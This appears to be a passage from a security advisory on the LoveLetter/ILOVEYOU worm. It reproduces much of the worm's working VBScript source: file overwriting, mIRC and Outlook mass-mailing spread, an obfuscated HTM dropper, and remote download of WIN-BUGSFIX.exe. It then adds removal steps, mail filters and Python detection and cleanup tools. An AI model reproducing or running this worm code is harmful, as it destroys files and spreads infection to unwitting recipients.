elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start 
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") 
' --- the fragment picks up inside the infectfiles sub: it writes a mIRC script.ini that DCC-sends the HTM dropper to anyone who joins a channel ---
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\Very Funny.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub

' recurse into every subfolder, infecting the files in each on the way down
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function

function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

' bug in the worm as written (left as in the original): the result is assigned to
' fileexist instead of folderexist, and GetFolderExists is not an FSO method
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

' Outlook/MAPI mass-mailer: one flag per address under HKCU\Software\Microsoft\WAB
' stops a recipient being mailed twice; the per-list count triggers a re-run when
' the address list grows
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "fwd: Joke"
male.Body = vbcrlf&""
male.Attachments.Add(dirsystem&"\Very Funny.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

' builds the HTM dropper: the page template in dta1/dta2 uses placeholder tokens
' (#-# for ', @-@ for ", ?-? for /, ^-^ for \) so it can live inside VBScript strings,
' and the worm's own source is re-read from WScript.ScriptFullName and embedded as
' a quoted string literal with ' " \ replaced by [-[ ]-] %-%; the stub at the end of
' the HTM reverses that and writes MSKernel32.vbs when the user allows ActiveX
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
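The html sub above is the dropper's packer: it hides the script inside an HTM file by replacing the three characters that would break a VBScript string literal (', " and \) with the tokens [-[, ]-] and %-%, wraps every line in quotes joined by &vbcrlf& _, and ships a short stub that reverses the substitutions and writes MSKernel32.vbs. The following is an added example, not code from the worm or from this advisory: a Python decoder that pulls the code= literal out of a dropper HTM and reverses both substitution tables, plus a constructed stand-in dropper laid out the same way so the round trip can be checked offline. The template head and tail in build_htm and the sample script are shortened, constructed stand-ins; the real HTM carries the full HTML shown in dta1/dta2.

```python
"""Decoder for the LoveLetter HTM dropper's string-substitution obfuscation.

Added example; not part of the worm source or the advisory. It mirrors the two
substitution tables used by the html sub:
  template placeholders (dta1/dta2):  #-# -> '   @-@ -> "   ?-? -> /   ^-^ -> \\
  script body (the quoted "code=" lines):  ' -> [-[   " -> ]-]   \\ -> %-%
"""
import re
import sys

TEMPLATE_TABLE = {"#-#": "'", "@-@": '"', "?-?": "/", "^-^": "\\"}
BODY_TABLE = {"[-[": "'", "]-]": '"', "%-%": "\\"}
CONTINUATION = "&vbcrlf& _"
# The literal starts right after "code=" and ends at the stub's "set fso=" line.
CODE_RE = re.compile(r"code=(.*?)\r?\nset fso=", re.S)


def decode_template(s: str) -> str:
    """Reverse the placeholder substitutions used in the HTML template."""
    for token, plain in TEMPLATE_TABLE.items():
        s = s.replace(token, plain)
    return s


def encode_body_line(line: str) -> str:
    """What the html sub does to each line of the running script."""
    for plain, token in (("'", "[-["), ('"', "]-]"), ("\\", "%-%")):
        line = line.replace(plain, token)
    return line


def build_code_literal(script_lines) -> str:
    """Quote every encoded line; all but the last get the VBScript continuation."""
    last = len(script_lines) - 1
    out = []
    for n, line in enumerate(script_lines):
        quoted = '"' + encode_body_line(line) + '"'
        out.append(quoted if n == last else quoted + CONTINUATION)
    return "\r\n".join(out)


def extract_payload(htm: str) -> str:
    """Recover the plain VBScript the dropper would write to MSKernel32.vbs."""
    m = CODE_RE.search(htm)
    if not m:
        raise ValueError("no code= literal found in HTM")
    lines = []
    for raw in m.group(1).split("\n"):
        raw = raw.rstrip("\r")
        if raw.endswith(CONTINUATION):
            raw = raw[: -len(CONTINUATION)]
        if not (raw.startswith('"') and raw.endswith('"')):
            raise ValueError("unexpected line in code literal: %r" % raw)
        lines.append(raw[1:-1])
    body = "\r\n".join(lines)
    for token, plain in BODY_TABLE.items():
        body = body.replace(token, plain)
    return body


def build_htm(script_lines) -> str:
    """Constructed stand-in dropper laid out as the html sub writes it:
    decoded head (dt5), the encoded script, vbcrlf, decoded stub (dt6).
    The template text is shortened; it is not the worm's full HTML."""
    head = decode_template(
        "<SCRIPT LANGUAGE=@-@VBScript@-@>\r\non error resume next\r\naw=1\r\ncode=")
    tail = decode_template(
        "set fso=CreateObject(@-@Scripting.FileSystemObject@-@)\r\n"
        "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)\r\n"
        "<?-?SCRIPT>")
    return head + build_code_literal(script_lines) + "\r\n" + tail


# Constructed sample body (not the worm); it exercises all three escaped characters.
SAMPLE_SCRIPT = [
    "rem constructed stand-in for the script body",
    "On Error Resume Next",
    'set fso=CreateObject("Scripting.FileSystemObject")',
    "path = dirsystem & \"\\MSKernel32.vbs\"  ' backslash and apostrophe",
]

if __name__ == "__main__":
    # usage: python decode_htm.py Very_Funny.HTM   (no argument: decode the stand-in)
    src = open(sys.argv[1], encoding="latin-1").read() if len(sys.argv) > 1 else build_htm(SAMPLE_SCRIPT)
    sys.stdout.write(extract_payload(src))
```

Run it against a captured LOVE-LETTER-FOR-YOU.HTM or Very Funny.HTM to get the script back in the clear for signature work. Because the packer only touches the three characters that matter to a VBScript string literal, a substring such as MSKernel32 still matches in the encoded copy, while anything containing a quote or a backslash does not; decoding first removes that blind spot.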
SOLUTION

Everyone should obtain and install the latest virus definition files for their virus scanning software. Mail administrators should filter out any email that carries a .VBS attachment, or at least any mail with a subject line of "ILOVEYOU" (note that the variant reproduced above mails itself with the subject "fwd: Joke" and the attachment "Very Funny.vbs", so a subject-only filter is not enough on its own).

Removing the virus is easy enough, but as another author ("The Pope") said, it is painful: the worm overwrites VBScript, WSH and the other file types listed below with copies of itself, so if you had useful files of those types their contents are already gone. The steps are:

1. Remove the registry entries

HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page (reset it to a page of your choosing)

and delete the MSKernel32.vbs and Win32DLL.vbs copies those Run/RunServices entries point to. If the download described above succeeded, also remove WIN-BUGSFIX.EXE and its Run entry. The per-recipient flags under HKEY_CURRENT_USER\Software\Microsoft\WAB are harmless but can be deleted as well.

2. Remove *all* instances of the following files:

LOVE-LETTER-FOR-YOU.HTM
*.vbs
*.vbe
*.js
*.jse
*.css
*.wsh
*.sct
*.hta

Find hidden files with .mp2 and .mp3 extensions and remove the "hidden" bit: the worm left those originals in place, hidden, next to a .vbs copy of itself. JPEG files were overwritten rather than hidden and have to be restored from backup. It is also a good idea to clear the "documents" folder.
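Step 2 is mechanical but easy to get wrong by hand on a large tree. The following is an added example, not from the advisory: a Python triage script for the file-side damage, using the worm behaviour described above (script-type files overwritten with the worm body; .mp2/.mp3 originals hidden beside a <name>.mp3.vbs copy; JPEGs overwritten) and marker strings taken from the source reproduced on this page. It reports by default and only deletes copies and clears hidden bits when run with --fix; the sample tree that demo() builds is constructed and contains no worm body.

```python
"""Triage of LoveLetter's file-side damage (added example, not from the advisory).

Behaviour relied on, as the advisory describes it:
  * .vbs/.vbe/.js/.jse/.css/.wsh/.sct/.hta files were overwritten with the worm
    body, so a file of those types that carries the worm's markers is a copy;
  * for .mp2/.mp3 the worm wrote <name>.mp3.vbs beside the original and set the
    original hidden, so the original is recoverable;
  * for .jpg/.jpeg the original was overwritten, so only the copy remains.
Marker strings come from the worm source reproduced on this page.
"""
import os
import sys
import tempfile

SCRIPT_TYPES = {".vbs", ".vbe", ".js", ".jse", ".css", ".wsh", ".sct", ".hta"}
HIDDEN_TYPES = {".mp2", ".mp3"}
LOST_TYPES = {".jpg", ".jpeg"}
MARKERS = (b"BAROK", b"LOVE-LETTER-FOR-YOU", b"MSKernel32", b"WIN-BUGSFIX")
FILE_ATTRIBUTE_HIDDEN = 0x2


def looks_like_worm(path, limit=65536):
    """True if the first 64 KiB carries one of the worm's marker strings."""
    try:
        with open(path, "rb") as fh:
            return any(m in fh.read(limit) for m in MARKERS)
    except OSError:
        return False


def triage(root):
    """Classify files under root. copies: worm bodies to delete; restore: hidden
    mp2/mp3 originals sitting beside a worm copy; lost: jpg/jpeg originals that
    were overwritten (only the name can be reported)."""
    found = {"copies": [], "restore": [], "lost": []}
    for dirpath, _dirs, files in os.walk(root):
        by_lower = {f.lower(): f for f in files}
        for f in files:
            stem, ext = os.path.splitext(f.lower())
            full = os.path.join(dirpath, f)
            if ext not in SCRIPT_TYPES or not looks_like_worm(full):
                continue
            found["copies"].append(full)
            inner_ext = os.path.splitext(stem)[1] if ext == ".vbs" else ""
            if inner_ext in HIDDEN_TYPES and stem in by_lower:
                found["restore"].append(os.path.join(dirpath, by_lower[stem]))
            elif inner_ext in LOST_TYPES:
                found["lost"].append(os.path.join(dirpath, stem))
    return {k: sorted(v) for k, v in found.items()}


def unhide(path):
    """Clear the hidden attribute; Windows only. Returns True if it was set."""
    if os.name != "nt":
        return False
    import ctypes
    k32 = ctypes.windll.kernel32
    attrs = k32.GetFileAttributesW(path)
    if attrs == 0xFFFFFFFF or not attrs & FILE_ATTRIBUTE_HIDDEN:
        return False
    return bool(k32.SetFileAttributesW(path, attrs & ~FILE_ATTRIBUTE_HIDDEN))


def clean(root, fix=False):
    """Report; with fix=True also delete the copies and unhide the originals."""
    report = triage(root)
    if fix:
        for p in report["restore"]:
            unhide(p)
        for p in report["copies"]:
            os.remove(p)
    return report


def demo():
    """Constructed sample tree (no real worm body), cleaned with fix=True."""
    worm = b"rem constructed stand-in, not the real script\r\nrem BAROK VBS - LOVELETTER\r\n"
    tree = {
        "song.mp3": b"ID3", "song.mp3.vbs": worm,   # hidden original + worm copy
        "photo.jpg.vbs": worm,                      # original was overwritten
        "login.vbs": worm,                          # user script overwritten in place
        "mine.vbs": b"WScript.Echo 1\r\n",          # untouched user script
        "style.css": b"body{}",                     # untouched
    }
    root = tempfile.mkdtemp()
    for name, data in tree.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    report = clean(root, fix=True)
    out = {k: [os.path.basename(p) for p in v] for k, v in report.items()}
    out["remaining"] = sorted(os.listdir(root))
    return out


if __name__ == "__main__":
    # usage: python triage.py C:\  [--fix]      (no argument: run the constructed demo)
    result = clean(sys.argv[1], fix="--fix" in sys.argv[2:]) if len(sys.argv) > 1 else demo()
    for kind, paths in result.items():
        for p in paths:
            print(kind, p)
```

The marker test keeps a user's own .vbs that the worm never reached (mine.vbs in the demo) off the delete list, which a blanket "del *.vbs" would not; the jpg.vbs copies are still deleted, but their originals can only be listed, not recovered.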
Some AV vendors with solutions for this problem:

Aladdin: http://www.aks.com/home/csrt/valerts.asp
CA: http://www.ca.com/virusinfo/virusalert.htm
DrSolomon: http://www.drsolomons.com/home/extra.zip
F-Secure: http://www.f-secure.com/download-purchase/updates.html
Finjan: http://www.finjan.com/attack_release_detail.cfm?attack_release_id=34
McAfee: http://download.mcafee.com/extrafiles/love-4.zip
NAI: http://vil.nai.com/villib/dispVirus.asp?virus_k=98617
Proland: http://www.pspl.com/virus_info/worms/loveletter.htm
Sophos: http://www.sophos.com/virusinfo/analyses/vbsloveleta.html
Sophos: http://www.sophos.com/virusinfo/analyses/trojloveleta.html
Symantec: http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
TrendMicro: http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTER-O

Jose Nazario has been kind enough to put up a ruleset for sendmail 8.9.x and 8.10.x that stops messages with "ILOVEYOU" in the subject line. You can find it at: http://biocserver.cwru.edu/~jose/iloveyouhack.txt

Matt Davis points out that you can modify John D. Hardin's procmail filters to stop the worm. You can find them at ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html

Sendmail.com has a rule to filter the worm based on the subject header at http://www2.sendmail.com/loveletter. It works with Sendmail 8.9 and newer.

If you are a Postfix user you can stop the virus by doing the following:

* Make sure your version of Postfix supports the header_checks directive.
* Add the line "header_checks = regexp:/etc/postfix/header_checks" to your main.cf file.
* Create a /etc/postfix/header_checks file with a line of:

  /^Subject:.*ILOVEYOU/ REJECT

  or better yet

  /Content.*\.vbs/ REJECT

  The second pattern matches the Content-Type/Content-Disposition headers that name the attachment, so it also catches variants that change the subject; regexp tables match case-insensitively by default, which takes care of .VBS and .Vbs. (On Postfix 2.0 and later the headers of MIME parts are matched by mime_header_checks, which defaults to the same table.)
* Execute "postfix reload".

For Exchange, Steve Willocks recommends Mail essentials for Exchange/SMTP. It's a commercial product that you configure to block messages based on types of attachments or keyword matches, among other features.
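The two Postfix patterns above illustrate the general choice: a subject filter is brittle (the variant reproduced earlier mails itself as "fwd: Joke"), while matching the attachment name catches anything that arrives as a script, whatever the subject says. The following is an added example, not code from the advisory or from any of the products listed: a Python check that parses a message with the standard email package and applies both tests, so that encoded or split MIME parameters are decoded before matching rather than regexed as raw header text. The three messages are constructed; their attachment bodies are placeholders, not the worm.

```python
"""Subject- and attachment-based check for LoveLetter-style mail
(added example, not from the advisory; the messages below are constructed)."""
import re
from email import message_from_string
from email.policy import default

SUBJECT_RE = re.compile(r"ILOVEYOU", re.I)
# File types the Windows Script Host (and mshta) will execute from a double-click.
SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".sct", ".hta"}


def script_attachments(msg):
    """Names of attached parts whose final extension is an executable script type.
    get_filename() decodes RFC 2047/2231 parameters and falls back from the
    Content-Disposition filename= to the Content-Type name= parameter, so the
    check is not fooled by the attachment being named in only one header."""
    names = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        fname = part.get_filename()
        if fname and "." + fname.rsplit(".", 1)[-1].lower() in SCRIPT_EXT:
            names.append(fname)
    return names


def verdict(raw):
    """Return both signals so an operator can see which one would have fired."""
    msg = message_from_string(raw, policy=default)
    subject_hit = bool(SUBJECT_RE.search(msg.get("Subject", "")))
    scripts = script_attachments(msg)
    return {"subject_match": subject_hit, "script_attachments": scripts,
            "reject": subject_hit or bool(scripts)}


# Constructed messages. The attachment bodies are placeholders, not the worm.
ORIGINAL = """\
From: someone@example.com
To: victim@example.com
Subject: ILOVEYOU
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

kindly check the attached LOVELETTER coming from me.
--b1
Content-Type: application/octet-stream; name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Disposition: attachment; filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

rem placeholder
--b1--
"""

# The variant from the spreadtoemail sub: different subject, attachment named only
# via the Content-Type name= parameter, extension in upper case.
VARIANT = """\
From: someone@example.com
To: victim@example.com
Subject: fwd: Joke
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain


--b2
Content-Type: application/octet-stream; name="Very Funny.VBS"

rem placeholder
--b2--
"""

BENIGN = """\
From: colleague@example.com
To: victim@example.com
Subject: Re: lunch, I love you all
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b3"

--b3
Content-Type: text/plain

see attached
--b3
Content-Type: text/plain; name="notes.txt"
Content-Disposition: attachment; filename="notes.txt"

nothing here
--b3--
"""

if __name__ == "__main__":
    for label, raw in (("original", ORIGINAL), ("variant", VARIANT), ("benign", BENIGN)):
        print(label, verdict(raw))
```

Wired into a milter or content filter, the reject flag is what matters; the subject-only rules quoted above would have let the second message through, and the third shows that matching the literal token ILOVEYOU does not trip on ordinary prose.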
You can find it at www.gfi.com/mesindex.htm

At least in some instances tabs in the virus code have been changed to spaces. That means the code looks the same and runs the same, but it is not byte-for-byte identical, and antivirus products that match on an exact signature may be fooled by this. Trend Micro InterScan for mail servers, Solaris version, seems to be affected. Thanks to Brett Dikeman for pointing this out.

Anyway, while everyone has been scrambling east and west, north and south trying to find the answer to these VBS viruses, the answer is not e-mail filtering, it's not better firewalls, and it's not the FBI. It is a file called WScript.Exe. A batch (.BAT) file with these two lines will deal with this problem (the first line is the NT/2000 location, the second the Windows 9x one):

ren %SystemRoot%\system32\wscript.exe wscript.sav
ren c:\windows\wscript.exe wscript.sav

If you get rid of this engine, then Visual Basic Scripts launched by opening an attachment cannot be run. This only does 50% of the job, though. There is a second version of the scripting host with the name cscript.exe. This one normally deals with command-line scripts (that is, scripts which don't use their own window but send their output to a console). CSCRIPT.EXE is also attached to the .vbs, .vbe, .jse etc. file types through the registry, so anything that can start a process can still run a script with "cscript.exe file.vbs" until it is renamed as well.

If you want to get rid of wscript.exe under Win2k, delete %systemroot%\system32\dllcache\wscript.exe first, and then %systemroot%\system32\wscript.exe. If you then simply refuse to insert the Win2k CD when System File Protection asks for it, that file will be marked as "not restored" somewhere within the bowels of the registry, and SFP will (hopefully) continue to shut up about it. This will also be visible in the Event Log.

The Cerberus Security Team have written a tool that will prevent PC users from being infected by such viral worms as the now infamous "I Love You" and its many variants, and any others that are still only a gleam in the eye of the budding virus writer.
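The tab-to-space note above is the classic way a byte-exact signature fails: VBScript does not care about the whitespace between tokens, so a copy re-saved with spaces runs identically yet no longer contains the original byte string. The following is an added example, not the advisory's or any vendor's detection logic: a Python matcher that normalises each line's whitespace before comparing against signature lines lifted from the worm source reproduced on this page, run against a constructed fragment in its original (tabbed) and re-spaced forms.

```python
"""Whitespace-insensitive signature match (added example, not from the advisory)."""
import re

_WS = re.compile(r"[ \t]+")


def normalize(script: str) -> str:
    """Collapse runs of spaces/tabs inside a line and trim line ends, so the
    tab-indented original and the space-converted variant compare equal."""
    lines = script.replace("\r\n", "\n").split("\n")
    return "\n".join(_WS.sub(" ", ln).strip() for ln in lines)


# Signature lines taken from the worm source above, stored in normalised form.
SIGNATURES = [
    'set dirsystem=fso.GetSpecialFolder(1)',
    'scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\\Very Funny.HTM"',
    'regedit.RegWrite "HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\"&malead,1,"REG_DWORD"',
]

# A byte-exact signature as an engine of the day might have stored it (with the tab).
TAB_SIGNATURE = "set\tdirsystem=fso.GetSpecialFolder(1)"


def exact_match(script: str) -> bool:
    """What a raw byte-string signature sees."""
    return TAB_SIGNATURE in script


def normalized_match(script: str, threshold: int = 2):
    """Return (verdict, matched signature lines); verdict is True when at least
    `threshold` signature lines are present after normalisation."""
    norm = normalize(script)
    hits = [s for s in SIGNATURES if normalize(s) in norm]
    return len(hits) >= threshold, hits


# Constructed fragment (not the worm) indented with tabs, and the same fragment
# after an editor turned the tabs into spaces.
SAMPLE_TABBED = (
    "On Error Resume Next\r\n"
    "set\tdirsystem=fso.GetSpecialFolder(1)\r\n"
    "scriptini.WriteLine\t\"n2= /.dcc send $nick \"&dirsystem&\"\\Very Funny.HTM\"\r\n"
    "regedit.RegWrite\t\"HKEY_CURRENT_USER\\Software\\Microsoft\\WAB\\\"&malead,1,\"REG_DWORD\"\r\n"
)
SAMPLE_SPACED = SAMPLE_TABBED.replace("\t", "    ")
SAMPLE_BENIGN = (
    "set fso=CreateObject(\"Scripting.FileSystemObject\")\r\n"
    "WScript.Echo fso.GetSpecialFolder(1)\r\n"
)

if __name__ == "__main__":
    for name, s in (("tabbed", SAMPLE_TABBED), ("spaced", SAMPLE_SPACED), ("benign", SAMPLE_BENIGN)):
        print(name, "exact:", exact_match(s), "normalised:", normalized_match(s))
```

Requiring two or more of the signature lines rather than one keeps a lone generic call such as GetSpecialFolder(1) from flagging ordinary administrative scripts; the same normalisation should be applied to the signature lines themselves, as normalized_match does, so that a signature copied with odd spacing does not silently never match.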
These rely on basic default configurations of a standard Microsoft box to be able to spread - and also a little help from the user by actually opening the attachment! As many will be aware, 99% of files on a Windows machine have a three-letter extension. This extension tells Windows Explorer how to deal with each file. For example, if you double-click on a file with the .txt extension, Explorer will look in the Registry to see what application to use to open it - notepad.exe in this case. As far as the "I Love You" worm is concerned it has a .vbs extension and so, when opened by the person it has been sent to, Windows looks in the Registry to see what application it should use to deal with the file - in this case wscript.exe. wscript.exe is a script interpreter, and when passed the file it executes the code it finds there - very much like what command.com or cmd.exe does for batch (.bat) files.

